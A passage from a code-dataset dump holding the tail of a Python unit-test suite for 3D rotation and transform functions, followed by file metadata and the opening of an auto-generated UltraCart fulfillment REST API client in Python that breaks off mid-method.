nt.assert_array_almost_equal(angvec2tr(0, [1, 0, 0]), trotx(0))
nt.assert_array_almost_equal(angvec2tr(pi / 4, [1, 0, 0]), trotx(pi / 4))
nt.assert_array_almost_equal(angvec2tr(-pi / 4, [1, 0, 0]), trotx(-pi / 4))
nt.assert_array_almost_equal(angvec2tr(0, [0, 1, 0]), troty(0))
nt.assert_array_almost_equal(angvec2tr(pi / 4, [0, 1, 0]), troty(pi / 4))
nt.assert_array_almost_equal(angvec2tr(-pi / 4, [0, 1, 0]), troty(-pi / 4))
nt.assert_array_almost_equal(angvec2tr(0, [0, 0, 1]), trotz(0))
nt.assert_array_almost_equal(angvec2tr(pi / 4, [0, 0, 1]), trotz(pi / 4))
nt.assert_array_almost_equal(angvec2tr(-pi / 4, [0, 0, 1]), trotz(-pi / 4))
r2d = 180 / pi
nt.assert_array_almost_equal(angvec2r(0, [1, 0, 0]), rotx(0))
nt.assert_array_almost_equal(angvec2r(pi / 4, [1, 0, 0]), rotx(pi / 4))
nt.assert_array_almost_equal(angvec2r(-pi / 4, [1, 0, 0]), rotx(-pi / 4))
def test_exp2r(self):
r2d = 180 / pi
nt.assert_array_almost_equal(exp2r([0, 0, 0]), rotx(0))
nt.assert_array_almost_equal(exp2r([pi / 4, 0, 0]), rotx(pi / 4))
nt.assert_array_almost_equal(exp2r([-pi / 4, 0, 0]), rotx(-pi / 4))
nt.assert_array_almost_equal(exp2r([0, 0, 0]), roty(0))
nt.assert_array_almost_equal(exp2r([0, pi / 4, 0]), roty(pi / 4))
nt.assert_array_almost_equal(exp2r([0, -pi / 4, 0]), roty(-pi / 4))
nt.assert_array_almost_equal(exp2r([0, 0, 0]), rotz(0))
nt.assert_array_almost_equal(exp2r([0, 0, pi / 4]), rotz(pi / 4))
nt.assert_array_almost_equal(exp2r([0, 0, -pi / 4]), rotz(-pi / 4))
def test_exp2tr(self):
r2d = 180 / pi
nt.assert_array_almost_equal(exp2tr([0, 0, 0]), trotx(0))
nt.assert_array_almost_equal(exp2tr([pi / 4, 0, 0]), trotx(pi / 4))
nt.assert_array_almost_equal(exp2tr([-pi / 4, 0, 0]), trotx(-pi / 4))
nt.assert_array_almost_equal(exp2tr([0, 0, 0]), troty(0))
nt.assert_array_almost_equal(exp2tr([0, pi / 4, 0]), troty(pi / 4))
nt.assert_array_almost_equal(exp2tr([0, -pi / 4, 0]), troty(-pi / 4))
nt.assert_array_almost_equal(exp2tr([0, 0, 0]), trotz(0))
nt.assert_array_almost_equal(exp2tr([0, 0, pi / 4]), trotz(pi / 4))
nt.assert_array_almost_equal(exp2tr([0, 0, -pi / 4]), trotz(-pi / 4))
def test_tr2rpy(self):
rpy = np.r_[0.1, 0.2, 0.3]
R = rpy2r(rpy)
nt.assert_array_almost_equal(tr2rpy(R), rpy)
nt.assert_array_almost_equal(tr2rpy(R, unit="deg"), rpy * 180 / pi)
T = rpy2tr(rpy)
nt.assert_array_almost_equal(
tr2rpy(T),
rpy,
)
nt.assert_array_almost_equal(tr2rpy(T, unit="deg"), rpy * 180 / pi)
# xyz order
R = rpy2r(rpy, order="xyz")
nt.assert_array_almost_equal(tr2rpy(R, order="xyz"), rpy)
nt.assert_array_almost_equal(tr2rpy(R, unit="deg", order="xyz"), rpy * 180 / pi)
T = rpy2tr(rpy, order="xyz")
nt.assert_array_almost_equal(tr2rpy(T, order="xyz"), rpy)
nt.assert_array_almost_equal(tr2rpy(T, unit="deg", order="xyz"), rpy * 180 / pi)
# corner cases
seq = "zyx"
ang = [pi, 0, 0]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, pi, 0]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, 0, pi]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, pi / 2, 0] # singularity
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, -pi / 2, 0]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
seq = "xyz"
ang = [pi, 0, 0]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, pi, 0]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, 0, pi]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, pi / 2, 0] # singularity
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, -pi / 2, 0]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
seq = "yxz"
ang = [pi, 0, 0]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, pi, 0]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, 0, pi]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, pi / 2, 0] # singularity
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, -pi / 2, 0]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
def test_tr2eul(self):
eul = np.r_[0.1, 0.2, 0.3]
R = eul2r(eul)
nt.assert_array_almost_equal(tr2eul(R), eul)
nt.assert_array_almost_equal(tr2eul(R, unit="deg"), eul * 180 / pi)
T = eul2tr(eul)
nt.assert_array_almost_equal(tr2eul(T), eul)
nt.assert_array_almost_equal(tr2eul(T, unit="deg"), eul * 180 / pi)
# test singularity case
eul = [0.1, 0, 0.3]
R = eul2r(eul)
nt.assert_array_almost_equal(eul2r(tr2eul(R)), R)
nt.assert_array_almost_equal(eul2r(tr2eul(R, unit="deg"), unit="deg"), R)
# test flip
eul = [-0.1, 0.2, 0.3]
R = eul2r(eul)
eul2 = tr2eul(R, flip=True)
nt.assert_equal(eul2[0] > 0, True)
nt.assert_array_almost_equal(eul2r(eul2), R)
def test_tr2angvec(self):
# null rotation
# - vector isn't defined here, but RTB sets it (0 0 0)
[theta, v] = tr2angvec(np.eye(3, 3))
nt.assert_array_almost_equal(theta, 0.0)
nt.assert_array_almost_equal(v, np.r_[0, 0, 0])
# canonic rotations
[theta, v] = tr2angvec(rotx(pi / 2))
nt.assert_array_almost_equal(theta, pi / 2)
nt.assert_array_almost_equal(v, np.r_[1, 0, 0])
[theta, v] = tr2angvec(roty(pi / 2))
nt.assert_array_almost_equal(theta, pi / 2)
nt.assert_array_almost_equal(v, np.r_[0, 1, 0])
[theta, v] = tr2angvec(rotz(pi / 2))
nt.assert_array_almost_equal(theta, pi / 2)
nt.assert_array_almost_equal(v, np.r_[0, 0, 1])
# null rotation
[theta, v] = tr2angvec(np.eye(4))
nt.assert_array_almost_equal(theta, 0.0)
nt.assert_array_almost_equal(v, np.r_[0, 0, 0])
# canonic rotations
[theta, v] = tr2angvec(trotx(pi / 2))
nt.assert_array_almost_equal(theta, pi / 2)
nt.assert_array_almost_equal(v, np.r_[1, 0, 0])
[theta, v] = tr2angvec(troty(pi / 2))
nt.assert_array_almost_equal(theta, pi / 2)
nt.assert_array_almost_equal(v, np.r_[0, 1, 0])
[theta, v] = tr2angvec(trotz(pi / 2))
nt.assert_array_almost_equal(theta, pi / 2)
nt.assert_array_almost_equal(v, np.r_[0, 0, 1])
[theta, v] = tr2angvec(roty(pi / 2), unit="deg")
nt.assert_array_almost_equal(theta, 90)
nt.assert_array_almost_equal(v, np.r_[0, 1, 0])
def test_print(self):
R = rotx(0.3) @ roty(0.4)
s = trprint(R, file=None)
self.assertIsInstance(s, str)
self.assertEqual(len(s), 30)
T = transl(1, 2, 3) @ trotx(0.3) @ troty(0.4)
s = trprint(T, file=None)
self.assertIsInstance(s, str)
self.assertEqual(len(s), 42)
self.assertTrue("rpy" in s)
self.assertTrue("zyx" in s)
s = trprint(T, file=None, orient="rpy/xyz")
self.assertIsInstance(s, str)
self.assertEqual(len(s), 39)
self.assertTrue("rpy" in s)
self.assertTrue("xyz" in s)
s = trprint(T, file=None, orient="eul")
self.assertIsInstance(s, str)
self.assertEqual(len(s), 37)
self.assertTrue("eul" in s)
self.assertFalse("zyx" in s)
def test_trinterp(self):
T0 = trotx(-0.3)
T1 = trotx(0.3)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=0), T0)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=1), T1)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=0.5), np.eye(4))
T0 = transl(-1, -2, -3)
T1 = transl(1, 2, 3)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=0), T0)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=1), T1)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=0.5), np.eye(4))
T0 = transl(-1, -2, -3) @ trotx(-0.3)
T1 = transl(1, 2, 3) @ trotx(0.3)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=0), T0)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=1), T1)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=0.5), np.eye(4))
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=0), T0)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=1), T1)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=0.5), np.eye(4))
def test_tr2delta(self):
# unit testing tr2delta with a tr matrix
nt.assert_array_almost_equal(
tr2delta(transl(0.1, 0.2, 0.3)), np.r_[0.1, 0.2, 0.3, 0, 0, 0]
)
nt.assert_array_almost_equal(
tr2delta(transl(0.1, 0.2, 0.3), transl(0.2, 0.4, 0.6)),
np.r_[0.1, 0.2, 0.3, 0, 0, 0],
)
nt.assert_array_almost_equal(
tr2delta(trotx(0.001)), np.r_[0, 0, 0, 0.001, 0, 0]
)
nt.assert_array_almost_equal(
tr2delta(troty(0.001)), np.r_[0, 0, 0, 0, 0.001, 0]
)
nt.assert_array_almost_equal(
tr2delta(trotz(0.001)), np.r_[0, 0, 0, 0, 0, 0.001]
)
nt.assert_array_almost_equal(
tr2delta(trotx(0.001), trotx(0.002)), np.r_[0, 0, 0, 0.001, 0, 0]
)
# %Testing with a scalar number input
# verifyError(tc, @()tr2delta(1),'SMTB:tr2delta:badarg');
# verifyError(tc, @()tr2delta( ones(3,3) ),'SMTB:tr2delta:badarg');
def test_delta2tr(self):
# test with standard numbers
nt.assert_array_almost_equal(
delta2tr([0.1, 0.2, 0.3, 0.4, 0.5, 0.6]),
np.array(
[
[1.0, -0.6, 0.5, 0.1],
[0.6, 1.0, -0.4, 0.2],
[-0.5, 0.4, 1.0, 0.3],
[0, 0, 0, 1.0],
]
),
)
# test, with, zeros
nt.assert_array_almost_equal(delta2tr([0, 0, 0, 0, 0, 0]), np.eye(4))
# test with scalar input
# verifyError(testCase, @()delta2tr(1),'MATLAB:badsubscript');
def test_tr2jac(self):
# NOTE, create these matrices using pyprint() in MATLAB
# TODO change to forming it from block R matrices directly
nt.assert_array_almost_equal(
tr2jac(trotx(pi / 2)).T,
np.array(
[
[1, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, -1, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, -1, 0],
]
),
)
nt.assert_array_almost_equal(
tr2jac(transl(1, 2, 3)).T,
np.array(
[
[1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1],
]
),
)
# test with scalar value
# verifyError(tc, @()tr2jac(1),'SMTB:t2r:badarg');
def test_r2x(self):
R = rpy2r(0.2, 0.3, 0.4)
nt.assert_array_almost_equal(r2x(R, representation="eul"), tr2eul(R))
nt.assert_array_almost_equal(r2x(R, representation="rpy/xyz"), tr2rpy(R, order="xyz"))
nt.assert_array_almost_equal(r2x(R, representation="rpy/zyx"), tr2rpy(R, order="zyx"))
nt.assert_array_almost_equal(r2x(R, representation="rpy/yxz"), tr2rpy(R, order="yxz"))
nt.assert_array_almost_equal(r2x(R, representation="arm"), tr2rpy(R, order="xyz"))
nt.assert_array_almost_equal(r2x(R, representation="vehicle"), tr2rpy(R, order="zyx"))
nt.assert_array_almost_equal(r2x(R, representation="camera"), tr2rpy(R, order="yxz"))
nt.assert_array_almost_equal(r2x(R, representation="exp"), trlog(R, twist=True))
def test_x2r(self):
x = [0.2, 0.3, 0.4]
nt.assert_array_almost_equal(x2r(x, representation="eul"), eul2r(x))
nt.assert_array_almost_equal(x2r(x, representation="rpy/xyz"), rpy2r(x, order="xyz"))
nt.assert_array_almost_equal(x2r(x, representation="rpy/zyx"), rpy2r(x, order="zyx"))
nt.assert_array_almost_equal(x2r(x, representation="rpy/yxz"), rpy2r(x, order="yxz"))
nt.assert_array_almost_equal(x2r(x, representation="arm"), rpy2r(x, order="xyz"))
nt.assert_array_almost_equal(x2r(x, representation="vehicle"), rpy2r(x, order="zyx"))
nt.assert_array_almost_equal(x2r(x, representation="camera"), rpy2r(x, order="yxz"))
nt.assert_array_almost_equal(x2r(x, representation="exp"), trexp(x))
def test_tr2x(self):
t = [1, 2, 3]
R = rpy2tr(0.2, 0.3, 0.4)
T = transl(t) @ R
x = tr2x(T, representation="eul")
nt.assert_array_almost_equal(x[:3], t)
nt.assert_array_almost_equal(x[3:], tr2eul(R))
x = tr2x(T, representation="rpy/xyz")
nt.assert_array_almost_equal(x[:3], t)
nt.assert_array_almost_equal(x[3:], tr2rpy(R, order="xyz"))
x = tr2x(T, representation="rpy/zyx")
nt.assert_array_almost_equal(x[:3], t)
nt.assert_array_almost_equal(x[3:], tr2rpy(R, order="zyx"))
x = tr2x(T, representation="rpy/yxz")
nt.assert_array_almost_equal(x[:3], t)
nt.assert_array_almost_equal(x[3:], tr2rpy(R, order="yxz"))
x = tr2x(T, representation="arm")
nt.assert_array_almost_equal(x[:3], t)
nt.assert_array_almost_equal(x[3:], tr2rpy(R, order="xyz"))
x = tr2x(T, representation="vehicle")
nt.assert_array_almost_equal(x[:3], t)
nt.assert_array_almost_equal(x[3:], tr2rpy(R, order="zyx"))
x = tr2x(T, representation="camera")
nt.assert_array_almost_equal(x[:3], t)
nt.assert_array_almost_equal(x[3:], tr2rpy(R, order="yxz"))
x = tr2x(T, representation="exp")
nt.assert_array_almost_equal(x[:3], t)
nt.assert_array_almost_equal(x[3:], trlog(t2r(R), twist=True))
def test_x2tr(self):
t = [1, 2, 3]
gamma = [0.3, 0.2, 0.1]
x = np.r_[t, gamma]
nt.assert_array_almost_equal(x2tr(x, representation="eul"), transl(t) @ eul2tr(gamma))
nt.assert_array_almost_equal(x2tr(x, representation="rpy/xyz"), transl(t) @ rpy2tr(gamma, order="xyz"))
nt.assert_array_almost_equal(x2tr(x, representation="rpy/zyx"), transl(t) @ rpy2tr(gamma, order="zyx"))
nt.assert_array_almost_equal(x2tr(x, representation="rpy/yxz"), transl(t) @ rpy2tr(gamma, order="yxz"))
nt.assert_array_almost_equal(x2tr(x, representation="arm"), transl(t) @ rpy2tr(gamma, order="xyz"))
nt.assert_array_almost_equal(x2tr(x, representation="vehicle"), transl(t) @ rpy2tr(gamma, order="zyx"))
nt.assert_array_almost_equal(x2tr(x, representation="camera"), transl(t) @ rpy2tr(gamma, order="yxz"))
nt.assert_array_almost_equal(x2tr(x, representation="exp"), transl(t) @ r2t(trexp(gamma)))
# ---------------------------------------------------------------------------------------#
if __name__ == "__main__":
unittest.main()
| 39.525788 | 111 | 0.567183 | 4,397 | 27,589 | 3.380714 | 0.045713 | 0.142079 | 0.200269 | 0.292701 | 0.877497 | 0.854827 | 0.836192 | 0.814194 | 0.761655 | 0.674201 | 0 | 0.075511 | 0.259814 | 27,589 | 697 | 112 | 39.582496 | 0.652417 | 0.042952 | 0 | 0.352031 | 0 | 0 | 0.019389 | 0 | 0 | 0 | 0 | 0.001435 | 0.537718 | 1 | 0.05029 | false | 0 | 0.015474 | 0 | 0.067698 | 0.009671 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ced9fea3b940d073fb37b1298b6979373995679d | 29,952 | py | Python | ultracart/api/fulfillment_api.py | UltraCart/rest_api_v2_sdk_python | d734ea13fabc7a57872ff68bac06861edb8fd882 | [
"Apache-2.0"
] | 1 | 2018-03-15T16:56:23.000Z | 2018-03-15T16:56:23.000Z | ultracart/api/fulfillment_api.py | UltraCart/rest_api_v2_sdk_python | d734ea13fabc7a57872ff68bac06861edb8fd882 | [
"Apache-2.0"
] | null | null | null | ultracart/api/fulfillment_api.py | UltraCart/rest_api_v2_sdk_python | d734ea13fabc7a57872ff68bac06861edb8fd882 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
UltraCart Rest API V2
UltraCart REST API Version 2 # noqa: E501
OpenAPI spec version: 2.0.0
Contact: support@ultracart.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ultracart.api_client import ApiClient
from ultracart.configuration import Configuration
class FulfillmentApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
@classmethod
def fromApiKey(cls, apiKey, verify_ssl = True, debug = False):
config = Configuration()
config.api_key['x-ultracart-simple-key'] = apiKey
config.debug = debug
config.verify_ssl = verify_ssl
api_client = ApiClient(configuration=config, header_name='X-UltraCart-Api-Version', header_value='2017-03-01')
return FulfillmentApi(api_client)
def acknowledge_orders(self, distribution_center_code, order_ids, **kwargs): # noqa: E501
"""Acknowledge receipt of orders. # noqa: E501
Acknowledge receipt of orders so that they are removed from the fulfillment queue. This method must be called after receiving and order (via webhook) or retrieving (via retrieve orders method). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.acknowledge_orders(distribution_center_code, order_ids, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str distribution_center_code: Distribution center code (required)
:param list[str] order_ids: Orders to acknowledge receipt of (limit 100) (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.acknowledge_orders_with_http_info(distribution_center_code, order_ids, **kwargs) # noqa: E501
else:
(data) = self.acknowledge_orders_with_http_info(distribution_center_code, order_ids, **kwargs) # noqa: E501
return data
def acknowledge_orders_with_http_info(self, distribution_center_code, order_ids, **kwargs): # noqa: E501
"""Acknowledge receipt of orders. # noqa: E501
Acknowledge receipt of orders so that they are removed from the fulfillment queue. This method must be called after receiving and order (via webhook) or retrieving (via retrieve orders method). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.acknowledge_orders_with_http_info(distribution_center_code, order_ids, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str distribution_center_code: Distribution center code (required)
:param list[str] order_ids: Orders to acknowledge receipt of (limit 100) (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['distribution_center_code', 'order_ids'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method acknowledge_orders" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'distribution_center_code' is set
if ('distribution_center_code' not in params or
params['distribution_center_code'] is None):
raise ValueError("Missing the required parameter `distribution_center_code` when calling `acknowledge_orders`") # noqa: E501
# verify the required parameter 'order_ids' is set
if ('order_ids' not in params or
params['order_ids'] is None):
raise ValueError("Missing the required parameter `order_ids` when calling `acknowledge_orders`") # noqa: E501
collection_formats = {}
path_params = {}
if 'distribution_center_code' in params:
path_params['distribution_center_code'] = params['distribution_center_code'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'order_ids' in params:
body_params = params['order_ids']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/fulfillment/distribution_centers/{distribution_center_code}/acknowledgements', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def generate_packing_slip(self, distribution_center_code, order_id, **kwargs): # noqa: E501
"""Generate a packing slip for this order for the given distribution center. # noqa: E501
The packing slip PDF that is returned is base 64 encoded # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.generate_packing_slip(distribution_center_code, order_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str distribution_center_code: Distribution center code (required)
:param str order_id: Order ID (required)
:return: OrdersResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.generate_packing_slip_with_http_info(distribution_center_code, order_id, **kwargs) # noqa: E501
else:
(data) = self.generate_packing_slip_with_http_info(distribution_center_code, order_id, **kwargs) # noqa: E501
return data
def generate_packing_slip_with_http_info(self, distribution_center_code, order_id, **kwargs): # noqa: E501
"""Generate a packing slip for this order for the given distribution center. # noqa: E501
The packing slip PDF that is returned is base 64 encoded # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.generate_packing_slip_with_http_info(distribution_center_code, order_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str distribution_center_code: Distribution center code (required)
:param str order_id: Order ID (required)
:return: OrdersResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['distribution_center_code', 'order_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method generate_packing_slip" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'distribution_center_code' is set
if ('distribution_center_code' not in params or
params['distribution_center_code'] is None):
raise ValueError("Missing the required parameter `distribution_center_code` when calling `generate_packing_slip`") # noqa: E501
# verify the required parameter 'order_id' is set
if ('order_id' not in params or
params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `generate_packing_slip`") # noqa: E501
collection_formats = {}
path_params = {}
if 'distribution_center_code' in params:
path_params['distribution_center_code'] = params['distribution_center_code'] # noqa: E501
if 'order_id' in params:
path_params['order_id'] = params['order_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/fulfillment/distribution_centers/{distribution_center_code}/orders/{order_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrdersResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_distribution_center_orders(self, distribution_center_code, **kwargs): # noqa: E501
"""Retrieve orders queued up for this distribution center. # noqa: E501
Retrieves up to 100 orders that are queued up in this distribution center. You must acknowledge them before additional new orders will be returned. There is NO record chunking. You'll get the same 100 records again and again until you acknowledge orders. The orders that are returned contain only items for this distribution center and are by default completely expanded with billing, buysafe, channel_partner, checkout, coupons, customer_profile, edi, gift, gift_certificate, internal, items, payment, shipping, summary, taxes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_distribution_center_orders(distribution_center_code, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str distribution_center_code: Distribution center code (required)
:return: OrdersResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_distribution_center_orders_with_http_info(distribution_center_code, **kwargs) # noqa: E501
else:
(data) = self.get_distribution_center_orders_with_http_info(distribution_center_code, **kwargs) # noqa: E501
return data
def get_distribution_center_orders_with_http_info(self, distribution_center_code, **kwargs): # noqa: E501
"""Retrieve orders queued up for this distribution center. # noqa: E501
Retrieves up to 100 orders that are queued up in this distribution center. You must acknowledge them before additional new orders will be returned. There is NO record chunking. You'll get the same 100 records again and again until you acknowledge orders. The orders that are returned contain only items for this distribution center and are by default completely expanded with billing, buysafe, channel_partner, checkout, coupons, customer_profile, edi, gift, gift_certificate, internal, items, payment, shipping, summary, taxes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_distribution_center_orders_with_http_info(distribution_center_code, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str distribution_center_code: Distribution center code (required)
:return: OrdersResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['distribution_center_code'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_distribution_center_orders" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'distribution_center_code' is set
if ('distribution_center_code' not in params or
params['distribution_center_code'] is None):
raise ValueError("Missing the required parameter `distribution_center_code` when calling `get_distribution_center_orders`") # noqa: E501
collection_formats = {}
path_params = {}
if 'distribution_center_code' in params:
path_params['distribution_center_code'] = params['distribution_center_code'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/fulfillment/distribution_centers/{distribution_center_code}/orders', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrdersResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_distribution_centers(self, **kwargs): # noqa: E501
"""Retrieve distribution centers # noqa: E501
Retrieves the distribution centers that this user has access to. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_distribution_centers(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: DistributionCentersResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_distribution_centers_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_distribution_centers_with_http_info(**kwargs) # noqa: E501
return data
def get_distribution_centers_with_http_info(self, **kwargs): # noqa: E501
"""Retrieve distribution centers # noqa: E501
Retrieves the distribution centers that this user has access to. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_distribution_centers_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: DistributionCentersResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_distribution_centers" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
